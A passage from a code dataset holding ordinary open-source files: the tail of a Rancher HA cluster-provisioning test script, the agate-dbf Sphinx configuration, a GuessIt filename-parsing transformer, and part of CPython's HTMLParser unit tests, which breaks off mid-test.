tls-rancher-ingress " \ "--cert=" + cert_path + " --key=" + key_path ca_command = export_cmd + " && kubectl -n cattle-system " \ "create secret generic tls-ca " \ "--from-file=" + ca_path run_command_with_stderr(tls_command) if not valid_cert: run_command_with_stderr(ca_command) def write_encoded_certs(path, contents): file = open(path, "w") file.write(base64.b64decode(contents).decode("utf-8")) file.close() def write_kubeconfig(): file = open(kubeconfig_path, "w") file.write(base64.b64decode(RANCHER_HA_KUBECONFIG).decode("utf-8")) file.close() def set_url_and_password(rancher_url, server_url=None): admin_token = set_url_password_token(rancher_url, server_url) admin_client = rancher.Client(url=rancher_url + "/v3", token=admin_token, verify=False) auth_url = rancher_url + "/v3-public/localproviders/local?action=login" user, user_token = create_user(admin_client, auth_url) env_details = "env.CATTLE_TEST_URL='" + rancher_url + "'\n" env_details += "env.ADMIN_TOKEN='" + admin_token + "'\n" env_details += "env.USER_TOKEN='" + user_token + "'\n" create_config_file(env_details) return admin_client def create_rke_cluster(config_path): rke_cmd = "rke --version && rke up --config " + config_path run_command_with_stderr(rke_cmd) def print_kubeconfig(): kubeconfig_file = open(kubeconfig_path, "r") kubeconfig_contents = kubeconfig_file.read() kubeconfig_file.close() kubeconfig_contents_encoded = base64.b64encode( kubeconfig_contents.encode("utf-8")).decode("utf-8") print("\n\n" + kubeconfig_contents + "\n\n") print("\nBase64 encoded: \n\n" + kubeconfig_contents_encoded + "\n\n") def create_rke_cluster_config(aws_nodes): configfile = "cluster-ha.yml" rkeconfig = readDataFile(DATA_SUBDIR, configfile) rkeconfig = rkeconfig.replace("$ip1", aws_nodes[0].public_ip_address) rkeconfig = rkeconfig.replace("$ip2", aws_nodes[1].public_ip_address) rkeconfig = rkeconfig.replace("$ip3", aws_nodes[2].public_ip_address) rkeconfig = rkeconfig.replace("$internalIp1", aws_nodes[0].private_ip_address) rkeconfig = rkeconfig.replace("$internalIp2", aws_nodes[1].private_ip_address) rkeconfig = rkeconfig.replace("$internalIp3", aws_nodes[2].private_ip_address) rkeconfig = rkeconfig.replace("$user1", aws_nodes[0].ssh_user) rkeconfig = rkeconfig.replace("$user2", aws_nodes[1].ssh_user) rkeconfig = rkeconfig.replace("$user3", aws_nodes[2].ssh_user) rkeconfig = rkeconfig.replace("$AWS_SSH_KEY_NAME", AWS_SSH_KEY_NAME) rkeconfig = rkeconfig.replace("$KUBERNETES_VERSION", KUBERNETES_VERSION) print("cluster-ha-filled.yml: \n" + rkeconfig + "\n") clusterfilepath = DATA_SUBDIR + "/" + "cluster-ha-filled.yml" f = open(clusterfilepath, "w") f.write(rkeconfig) f.close() return clusterfilepath def create_aks_cluster(): tf_dir = DATA_SUBDIR + "/" + "terraform/aks" aks_k8_s_version = os.environ.get('RANCHER_AKS_K8S_VERSION', '') aks_location = os.environ.get('RANCHER_AKS_LOCATION', '') client_id = os.environ.get('ARM_CLIENT_ID', '') client_secret = os.environ.get('ARM_CLIENT_SECRET', '') tf = Terraform(working_dir=tf_dir, variables={'kubernetes_version': aks_k8_s_version, 'location': aks_location, 'client_id': client_id, 'client_secret': client_secret, 'cluster_name': resource_prefix}) print("Creating cluster") tf.init() print(tf.plan(out="aks_plan_server.out")) print("\n\n") print(tf.apply("--auto-approve")) print("\n\n") out_string = tf.output("kube_config", full_value=True) with open(kubeconfig_path, "w") as kubefile: kubefile.write(out_string) def install_aks_ingress(): run_command_with_stderr(export_cmd + " && kubectl apply -f " + DATA_SUBDIR + "/aks_nlb.yml") @pytest.fixture(scope='module') def precheck_certificate_options(): if RANCHER_HA_CERT_OPTION == 'byo-valid': if RANCHER_VALID_TLS_CERT == '' or \ RANCHER_VALID_TLS_KEY == '' or \ RANCHER_VALID_TLS_CERT is None or \ RANCHER_VALID_TLS_KEY is None: raise pytest.skip( 'Valid certificates not found in environment variables') elif RANCHER_HA_CERT_OPTION == 'byo-self-signed': if RANCHER_BYO_TLS_CERT == '' or \ RANCHER_BYO_TLS_KEY == '' or \ RANCHER_PRIVATE_CA_CERT == '' or \ RANCHER_BYO_TLS_CERT is None or \ RANCHER_BYO_TLS_KEY is None or \ RANCHER_PRIVATE_CA_CERT is None: raise pytest.skip( 'Self signed certificates not found in environment variables') elif RANCHER_HA_CERT_OPTION == 'letsencrypt': if RANCHER_LETSENCRYPT_EMAIL == '' or \ RANCHER_LETSENCRYPT_EMAIL is None: raise pytest.skip( 'LetsEncrypt email is not found in environment variables') @pytest.fixture(scope='module') def precheck_upgrade_options(): if RANCHER_HA_KUBECONFIG == '' or RANCHER_HA_KUBECONFIG is None: raise pytest.skip('Kubeconfig is not found for upgrade!') if RANCHER_HA_HOSTNAME == '' or RANCHER_HA_HOSTNAME is None: raise pytest.skip('Hostname is not found for upgrade!')
apache-2.0
onyxfish/agate-dbf
docs/conf.py
2
7302
# -*- coding: utf-8 -*- # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import os import sys # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('..')) # -- General configuration ----------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx'] autodoc_member_order = 'bysource' intersphinx_mapping = { 'python': ('http://docs.python.org/3.5/', None), 'agate': ('http://agate.readthedocs.org/en/latest/', None) } # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'agate-dbf' copyright = u'2015, Christopher Groskopf' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.2.3' # The full version, including alpha/beta/rc tags. release = '0.2.3' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'default' on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()] # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'agatedbfdoc' # -- Options for LaTeX output -------------------------------------------------- # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass [howto/manual]). latex_documents = [ ('index', 'agate-dbf.tex', u'agate-dbf Documentation', u'Christopher Groskopf', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output -------------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ]
mit
giggsey/SickRage
lib/guessit/transfo/split_explicit_groups.py
28
2804
#!/usr/bin/env python # -*- coding: utf-8 -*- # # GuessIt - A library for guessing information from filenames # Copyright (c) 2013 Nicolas Wack <wackou@gmail.com> # # GuessIt is free software; you can redistribute it and/or modify it under # the terms of the Lesser GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # GuessIt is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # Lesser GNU General Public License for more details. # # You should have received a copy of the Lesser GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # from __future__ import absolute_import, division, print_function, unicode_literals from functools import reduce from guessit.plugins.transformers import Transformer from guessit.textutils import find_first_level_groups from guessit.patterns import group_delimiters class SplitExplicitGroups(Transformer): def __init__(self): Transformer.__init__(self, 250) def process(self, mtree, options=None): """split each of those into explicit groups (separated by parentheses or square brackets) :return: return the string split into explicit groups, that is, those either between parenthese, square brackets or curly braces, and those separated by a dash.""" for c in mtree.unidentified_leaves(): groups = find_first_level_groups(c.value, group_delimiters[0]) for delimiters in group_delimiters: flatten = lambda l, x: l + find_first_level_groups(x, delimiters) groups = reduce(flatten, groups, []) # do not do this at this moment, it is not strong enough and can break other # patterns, such as dates, etc... # groups = functools.reduce(lambda l, x: l + x.split('-'), groups, []) c.split_on_components(groups, category='explicit') def post_process(self, mtree, options=None): """ Decrease confidence for properties found in explicit groups. :param mtree: :param options: :return: """ if not options.get('name_only'): explicit_nodes = [node for node in mtree.nodes() if node.category == 'explicit' and node.is_explicit()] for explicit_node in explicit_nodes: self.alter_confidence(explicit_node, 0.5) def alter_confidence(self, node, factor): for guess in node.guesses: for k in guess.keys(): confidence = guess.confidence(k) guess.set_confidence(k, confidence * factor)
gpl-3.0
wdv4758h/ZipPy
lib-python/3/test/test_htmlparser.py
2
29466
"""Tests for HTMLParser.py.""" import html.parser import pprint import unittest from test import support class EventCollector(html.parser.HTMLParser): def __init__(self, *args, **kw): self.events = [] self.append = self.events.append html.parser.HTMLParser.__init__(self, *args, **kw) def get_events(self): # Normalize the list of events so that buffer artefacts don't # separate runs of contiguous characters. L = [] prevtype = None for event in self.events: type = event[0] if type == prevtype == "data": L[-1] = ("data", L[-1][1] + event[1]) else: L.append(event) prevtype = type self.events = L return L # structure markup def handle_starttag(self, tag, attrs): self.append(("starttag", tag, attrs)) def handle_startendtag(self, tag, attrs): self.append(("startendtag", tag, attrs)) def handle_endtag(self, tag): self.append(("endtag", tag)) # all other markup def handle_comment(self, data): self.append(("comment", data)) def handle_charref(self, data): self.append(("charref", data)) def handle_data(self, data): self.append(("data", data)) def handle_decl(self, data): self.append(("decl", data)) def handle_entityref(self, data): self.append(("entityref", data)) def handle_pi(self, data): self.append(("pi", data)) def unknown_decl(self, decl): self.append(("unknown decl", decl)) class EventCollectorExtra(EventCollector): def handle_starttag(self, tag, attrs): EventCollector.handle_starttag(self, tag, attrs) self.append(("starttag_text", self.get_starttag_text())) class TestCaseBase(unittest.TestCase): def get_collector(self): raise NotImplementedError def _run_check(self, source, expected_events, collector=None): if collector is None: collector = self.get_collector() parser = collector for s in source: parser.feed(s) parser.close() events = parser.get_events() if events != expected_events: self.fail("received events did not match expected events\n" "Expected:\n" + pprint.pformat(expected_events) + "\nReceived:\n" + pprint.pformat(events)) def _run_check_extra(self, source, events): self._run_check(source, events, EventCollectorExtra()) def _parse_error(self, source): def parse(source=source): parser = self.get_collector() parser.feed(source) parser.close() self.assertRaises(html.parser.HTMLParseError, parse) class HTMLParserStrictTestCase(TestCaseBase): def get_collector(self): return EventCollector(strict=True) def test_processing_instruction_only(self): self._run_check("<?processing instruction>", [ ("pi", "processing instruction"), ]) self._run_check("<?processing instruction ?>", [ ("pi", "processing instruction ?"), ]) def test_simple_html(self): self._run_check(""" <!DOCTYPE html PUBLIC 'foo'> <HTML>&entity;&#32; <!--comment1a -></foo><bar>&lt;<?pi?></foo<bar comment1b--> <Img sRc='Bar' isMAP>sample text &#x201C; <!--comment2a-- --comment2b--> </Html> """, [ ("data", "\n"), ("decl", "DOCTYPE html PUBLIC 'foo'"), ("data", "\n"), ("starttag", "html", []), ("entityref", "entity"), ("charref", "32"), ("data", "\n"), ("comment", "comment1a\n-></foo><bar>&lt;<?pi?></foo<bar\ncomment1b"), ("data", "\n"), ("starttag", "img", [("src", "Bar"), ("ismap", None)]), ("data", "sample\ntext\n"), ("charref", "x201C"), ("data", "\n"), ("comment", "comment2a-- --comment2b"), ("data", "\n"), ("endtag", "html"), ("data", "\n"), ]) def test_malformatted_charref(self): self._run_check("<p>&#bad;</p>", [ ("starttag", "p", []), ("data", "&#bad;"), ("endtag", "p"), ]) def test_unclosed_entityref(self): self._run_check("&entityref foo", [ ("entityref", "entityref"), ("data", " foo"), ]) def test_bad_nesting(self): # Strangely, this *is* supposed to test that overlapping # elements are allowed. HTMLParser is more geared toward # lexing the input that parsing the structure. self._run_check("<a><b></a></b>", [ ("starttag", "a", []), ("starttag", "b", []), ("endtag", "a"), ("endtag", "b"), ]) def test_bare_ampersands(self): self._run_check("this text & contains & ampersands &", [ ("data", "this text & contains & ampersands &"), ]) def test_bare_pointy_brackets(self): self._run_check("this < text > contains < bare>pointy< brackets", [ ("data", "this < text > contains < bare>pointy< brackets"), ]) def test_illegal_declarations(self): self._parse_error('<!spacer type="block" height="25">') def test_starttag_end_boundary(self): self._run_check("""<a b='<'>""", [("starttag", "a", [("b", "<")])]) self._run_check("""<a b='>'>""", [("starttag", "a", [("b", ">")])]) def test_buffer_artefacts(self): output = [("starttag", "a", [("b", "<")])] self._run_check(["<a b='<'>"], output) self._run_check(["<a ", "b='<'>"], output) self._run_check(["<a b", "='<'>"], output) self._run_check(["<a b=", "'<'>"], output) self._run_check(["<a b='<", "'>"], output) self._run_check(["<a b='<'", ">"], output) output = [("starttag", "a", [("b", ">")])] self._run_check(["<a b='>'>"], output) self._run_check(["<a ", "b='>'>"], output) self._run_check(["<a b", "='>'>"], output) self._run_check(["<a b=", "'>'>"], output) self._run_check(["<a b='>", "'>"], output) self._run_check(["<a b='>'", ">"], output) output = [("comment", "abc")] self._run_check(["", "<!--abc-->"], output) self._run_check(["<", "!--abc-->"], output) self._run_check(["<!", "--abc-->"], output) self._run_check(["<!-", "-abc-->"], output) self._run_check(["<!--", "abc-->"], output) self._run_check(["<!--a", "bc-->"], output) self._run_check(["<!--ab", "c-->"], output) self._run_check(["<!--abc", "-->"], output) self._run_check(["<!--abc-", "->"], output) self._run_check(["<!--abc--", ">"], output) self._run_check(["<!--abc-->", ""], output) def test_starttag_junk_chars(self): self._parse_error("</>") self._parse_error("</$>") self._parse_error("</") self._parse_error("</a") self._parse_error("<a<a>") self._parse_error("</a<a>") self._parse_error("<!") self._parse_error("<a") self._parse_error("<a foo='bar'") self._parse_error("<a foo='bar") self._parse_error("<a foo='>'") self._parse_error("<a foo='>") def test_valid_doctypes(self): # from http://www.w3.org/QA/2002/04/valid-dtd-list.html dtds = ['HTML', # HTML5 doctype ('HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" ' '"http://www.w3.org/TR/html4/strict.dtd"'), ('HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" ' '"http://www.w3.org/TR/html4/loose.dtd"'), ('html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" ' '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"'), ('html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" ' '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"'), ('math PUBLIC "-//W3C//DTD MathML 2.0//EN" ' '"http://www.w3.org/Math/DTD/mathml2/mathml2.dtd"'), ('html PUBLIC "-//W3C//DTD ' 'XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN" ' '"http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg.dtd"'), ('svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ' '"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"'), 'html PUBLIC "-//IETF//DTD HTML 2.0//EN"', 'html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"'] for dtd in dtds: self._run_check("<!DOCTYPE %s>" % dtd, [('decl', 'DOCTYPE ' + dtd)]) def test_declaration_junk_chars(self): self._parse_error("<!DOCTYPE foo $ >") def test_startendtag(self): self._run_check("<p/>", [ ("startendtag", "p", []), ]) self._run_check("<p></p>", [ ("starttag", "p", []), ("endtag", "p"), ]) self._run_check("<p><img src='foo' /></p>", [ ("starttag", "p", []), ("startendtag", "img", [("src", "foo")]), ("endtag", "p"), ]) def test_get_starttag_text(self): s = """<foo:bar \n one="1"\ttwo=2 >""" self._run_check_extra(s, [ ("starttag", "foo:bar", [("one", "1"), ("two", "2")]), ("starttag_text", s)]) def test_cdata_content(self): contents = [ '<!-- not a comment --> &not-an-entity-ref;', "<not a='start tag'>", '<a href="" /> <p> <span></span>', 'foo = "</scr" + "ipt>";', 'foo = "</SCRIPT" + ">";', 'foo = <\n/script> ', '<!-- document.write("</scr" + "ipt>"); -->', ('\n//<![CDATA[\n' 'document.write(\'<s\'+\'cript type="text/javascript" ' 'src="http://www.example.org/r=\'+new ' 'Date().getTime()+\'"><\\/s\'+\'cript>\');\n//]]>'), '\n<!-- //\nvar foo = 3.14;\n// -->\n', 'foo = "</sty" + "le>";', '<!-- \u2603 -->', # these two should be invalid according to the HTML 5 spec, # section 8.1.2.2 #'foo = </\nscript>', #'foo = </ script>', ] elements = ['script', 'style', 'SCRIPT', 'STYLE', 'Script', 'Style'] for content in contents: for element in elements: element_lower = element.lower() s = '<{element}>{content}</{element}>'.format(element=element, content=content) self._run_check(s, [("starttag", element_lower, []), ("data", content), ("endtag", element_lower)]) def test_cdata_with_closing_tags(self): # see issue #13358 # make sure that HTMLParser calls handle_data only once for each CDATA. # The normal event collector normalizes the events in get_events, # so we override it to return the original list of events. class Collector(EventCollector): def get_events(self): return self.events content = """<!-- not a comment --> &not-an-entity-ref; <a href="" /> </p><p> <span></span></style> '</script' + '>'""" for element in [' script', 'script ', ' script ', '\nscript', 'script\n', '\nscript\n']: element_lower = element.lower().strip() s = '<script>{content}</{element}>'.format(element=element, content=content) self._run_check(s, [("starttag", element_lower, []), ("data", content), ("endtag", element_lower)], collector=Collector()) def test_comments(self): html = ("<!-- I'm a valid comment -->" '<!--me too!-->' '<!------>' '<!---->' '<!----I have many hyphens---->' '<!-- I have a > in the middle -->' '<!-- and I have -- in the middle! -->') expected = [('comment', " I'm a valid comment "), ('comment', 'me too!'), ('comment', '--'), ('comment', ''), ('comment', '--I have many hyphens--'), ('comment', ' I have a > in the middle '), ('comment', ' and I have -- in the middle! ')] self._run_check(html, expected) def test_condcoms(self): html = ('<!--[if IE & !(lte IE 8)]>aren\'t<![endif]-->' '<!--[if IE 8]>condcoms<![endif]-->' '<!--[if lte IE 7]>pretty?<![endif]-->') expected = [('comment', "[if IE & !(lte IE 8)]>aren't<![endif]"), ('comment', '[if IE 8]>condcoms<![endif]'), ('comment', '[if lte IE 7]>pretty?<![endif]')] self._run_check(html, expected) class HTMLParserTolerantTestCase(HTMLParserStrictTestCase): def get_collector(self): return EventCollector(strict=False) def test_tolerant_parsing(self): self._run_check('<html <html>te>>xt&a<<bc</a></html>\n' '<img src="URL><//img></html</html>', [ ('starttag', 'html', [('<html', None)]), ('data', 'te>>xt'), ('entityref', 'a'), ('data', '<<bc'), ('endtag', 'a'), ('endtag', 'html'), ('data', '\n<img src="URL>'), ('comment', '/img'), ('endtag', 'html<')]) def test_starttag_junk_chars(self): self._run_check("</>", []) self._run_check("</$>", [('comment', '$')]) self._run_check("</", [('data', '</')]) self._run_check("</a", [('data', '</a')]) # XXX this might be wrong self._run_check("<a<a>", [('data', '<a'), ('starttag', 'a', [])]) self._run_check("</a<a>", [('endtag', 'a<a')]) self._run_check("<!", [('data', '<!')]) self._run_check("<a", [('data', '<a')]) self._run_check("<a foo='bar'", [('data', "<a foo='bar'")]) self._run_check("<a foo='bar", [('data', "<a foo='bar")]) self._run_check("<a foo='>'", [('data', "<a foo='>'")]) self._run_check("<a foo='>", [('data', "<a foo='>")]) def test_slashes_in_starttag(self): self._run_check('<a foo="var"/>', [('startendtag', 'a', [('foo', 'var')])]) html = ('<img width=902 height=250px ' 'src="/sites/default/files/images/homepage/foo.jpg" ' '/*what am I doing here*/ />') expected = [( 'startendtag', 'img', [('width', '902'), ('height', '250px'), ('src', '/sites/default/files/images/homepage/foo.jpg'), ('*what', None), ('am', None), ('i', None), ('doing', None), ('here*', None)] )] self._run_check(html, expected) html = ('<a / /foo/ / /=/ / /bar/ / />' '<a / /foo/ / /=/ / /bar/ / >') expected = [ ('startendtag', 'a', [('foo', None), ('=', None), ('bar', None)]), ('starttag', 'a', [('foo', None), ('=', None), ('bar', None)]) ] self._run_check(html, expected) def test_declaration_junk_chars(self): self._run_check("<!DOCTYPE foo $ >", [('decl', 'DOCTYPE foo $ ')]) def test_illegal_declarations(self): self._run_check('<!spacer type="block" height="25">', [('comment', 'spacer type="block" height="25"')]) def test_with_unquoted_attributes(self): # see #12008 html = ("<html><body bgcolor=d0ca90 text='181008'>" "<table cellspacing=0 cellpadding=1 width=100% ><tr>" "<td align=left><font size=-1>" "- <a href=/rabota/><span class=en> software-and-i</span></a>" "- <a href='/1/'><span class=en> library</span></a></table>") expected = [ ('starttag', 'html', []), ('starttag', 'body', [('bgcolor', 'd0ca90'), ('text', '181008')]), ('starttag', 'table', [('cellspacing', '0'), ('cellpadding', '1'), ('width', '100%')]), ('starttag', 'tr', []), ('starttag', 'td', [('align', 'left')]), ('starttag', 'font', [('size', '-1')]), ('data', '- '), ('starttag', 'a', [('href', '/rabota/')]), ('starttag', 'span', [('class', 'en')]), ('data', ' software-and-i'), ('endtag', 'span'), ('endtag', 'a'), ('data', '- '), ('starttag', 'a', [('href', '/1/')]), ('starttag', 'span', [('class', 'en')]), ('data', ' library'), ('endtag', 'span'), ('endtag', 'a'), ('endtag', 'table') ] self._run_check(html, expected) def test_comma_between_attributes(self): self._run_check('<form action="/xxx.php?a=1&amp;b=2&amp", ' 'method="post">', [ ('starttag', 'form', [('action', '/xxx.php?a=1&b=2&amp'), (',', None), ('method', 'post')])]) def test_weird_chars_in_unquoted_attribute_values(self): self._run_check('<form action=bogus|&#()value>', [ ('starttag', 'form', [('action', 'bogus|&#()value')])]) def test_invalid_end_tags(self): # A collection of broken end tags. <br> is used as separator. # see http://www.w3.org/TR/html5/tokenization.html#end-tag-open-state # and #13993 html = ('<br></label</p><br></div end tmAd-leaderBoard><br></<h4><br>' '</li class="unit"><br></li\r\n\t\t\t\t\t\t</ul><br></><br>') expected = [('starttag', 'br', []), # < is part of the name, / is discarded, p is an attribute ('endtag', 'label<'), ('starttag', 'br', []), # text and attributes are discarded ('endtag', 'div'), ('starttag', 'br', []), # comment because the first char after </ is not a-zA-Z ('comment', '<h4'), ('starttag', 'br', []), # attributes are discarded ('endtag', 'li'), ('starttag', 'br', []), # everything till ul (included) is discarded ('endtag', 'li'), ('starttag', 'br', []), # </> is ignored ('starttag', 'br', [])] self._run_check(html, expected) def test_broken_invalid_end_tag(self): # This is technically wrong (the "> shouldn't be included in the 'data') # but is probably not worth fixing it (in addition to all the cases of # the previous test, it would require a full attribute parsing). # see #13993 html = '<b>This</b attr=">"> confuses the parser' expected = [('starttag', 'b', []), ('data', 'This'), ('endtag', 'b'), ('data', '"> confuses the parser')] self._run_check(html, expected) def test_correct_detection_of_start_tags(self): # see #13273 html = ('<div style="" ><b>The <a href="some_url">rain</a> ' '<br /> in <span>Spain</span></b></div>') expected = [ ('starttag', 'div', [('style', '')]), ('starttag', 'b', []), ('data', 'The '), ('starttag', 'a', [('href', 'some_url')]), ('data', 'rain'), ('endtag', 'a'), ('data', ' '), ('startendtag', 'br', []), ('data', ' in '), ('starttag', 'span', []), ('data', 'Spain'), ('endtag', 'span'), ('endtag', 'b'), ('endtag', 'div') ] self._run_check(html, expected) html = '<div style="", foo = "bar" ><b>The <a href="some_url">rain</a>' expected = [ ('starttag', 'div', [('style', ''), (',', None), ('foo', 'bar')]), ('starttag', 'b', []), ('data', 'The '), ('starttag', 'a', [('href', 'some_url')]), ('data', 'rain'), ('endtag', 'a'), ] self._run_check(html, expected) def test_unescape_function(self): p = self.get_collector() self.assertEqual(p.unescape('&#bad;'),'&#bad;') self.assertEqual(p.unescape('&#0038;'),'&') # see #12888 self.assertEqual(p.unescape('&#123; ' * 1050), '{ ' * 1050) def test_broken_comments(self): html = ('<! not really a comment >' '<! not a comment either -->' '<! -- close enough -->' '<!><!<-- this was an empty comment>' '<!!! another bogus comment !!!>') expected = [ ('comment', ' not really a comment '), ('comment', ' not a comment either --'), ('comment', ' -- close enough --'), ('comment', ''), ('comment', '<-- this was an empty comment'), ('comment', '!! another bogus comment !!!'), ] self._run_check(html, expected) def test_broken_condcoms(self): # these condcoms are missing the '--' after '<!' and before the '>' html = ('<![if !(IE)]>broken condcom<![endif]>' '<![if ! IE]><link href="favicon.tiff"/><![endif]>' '<![if !IE 6]><img src="firefox.png" /><![endif]>' '<![if !ie 6]><b>foo</b><![endif]>' '<![if (!IE)|(lt IE 9)]><img src="mammoth.bmp" /><![endif]>') # According to the HTML5 specs sections "8.2.4.44 Bogus comment state" # and "8.2.4.45 Markup declaration open state", comment tokens should # be emitted instead of 'unknown decl', but calling unknown_decl # provides more flexibility. # See also Lib/_markupbase.py:parse_declaration expected = [ ('unknown decl', 'if !(IE)'), ('data', 'broken condcom'), ('unknown decl', 'endif'), ('unknown decl', 'if ! IE'), ('startendtag', 'link', [('href', 'favicon.tiff')]), ('unknown decl', 'endif'), ('unknown decl', 'if !IE 6'), ('startendtag', 'img', [('src', 'firefox.png')]), ('unknown decl', 'endif'), ('unknown decl', 'if !ie 6'), ('starttag', 'b', []), ('data', 'foo'), ('endtag', 'b'), ('unknown decl', 'endif'), ('unknown decl', 'if (!IE)|(lt IE 9)'), ('startendtag', 'img', [('src', 'mammoth.bmp')]), ('unknown decl', 'endif') ] self._run_check(html, expected) class AttributesStrictTestCase(TestCaseBase): def get_collector(self): return EventCollector(strict=True) def test_attr_syntax(self): output = [ ("starttag", "a", [("b", "v"), ("c", "v"), ("d", "v"), ("e", None)]) ] self._run_check("""<a b='v' c="v" d=v e>""", output) self._run_check("""<a b = 'v' c = "v" d = v e>""", output) self._run_check("""<a\nb\n=\n'v'\nc\n=\n"v"\nd\n=\nv\ne>""", output) self._run_check("""<a\tb\t=\t'v'\tc\t=\t"v"\td\t=\tv\te>""", output) def test_attr_values(self): self._run_check("""<a b='xxx\n\txxx' c="yyy\t\nyyy" d='\txyz\n'>""", [("starttag", "a", [("b", "xxx\n\txxx"), ("c", "yyy\t\nyyy"), ("d", "\txyz\n")])]) self._run_check("""<a b='' c="">""", [("starttag", "a", [("b", ""), ("c", "")])]) # Regression test for SF patch #669683. self._run_check("<e a=rgb(1,2,3)>", [("starttag", "e", [("a", "rgb(1,2,3)")])]) # Regression test for SF bug #921657. self._run_check( "<a href=mailto:xyz@example.com>", [("starttag", "a", [("href", "mailto:xyz@example.com")])]) def test_attr_nonascii(self): # see issue 7311 self._run_check( "<img src=/foo/bar.png alt=\u4e2d\u6587>", [("starttag", "img", [("src", "/foo/bar.png"), ("alt", "\u4e2d\u6587")])]) self._run_check( "<a title='\u30c6\u30b9\u30c8' href='\u30c6\u30b9\u30c8.html'>", [("starttag", "a", [("title", "\u30c6\u30b9\u30c8"), ("href", "\u30c6\u30b9\u30c8.html")])]) self._run_check( '<a title="\u30c6\u30b9\u30c8" href="\u30c6\u30b9\u30c8.html">', [("starttag", "a", [("title", "\u30c6\u30b9\u30c8"), ("href", "\u30c6\u30b9\u30c8.html")])]) def test_attr_entity_replacement(self): self._run_check( "<a b='&amp;&gt;&lt;&quot;&apos;'>", [("starttag", "a", [("b", "&><\"'")])]) def test_attr_funky_names(self): self._run_check( "<a a.b='v' 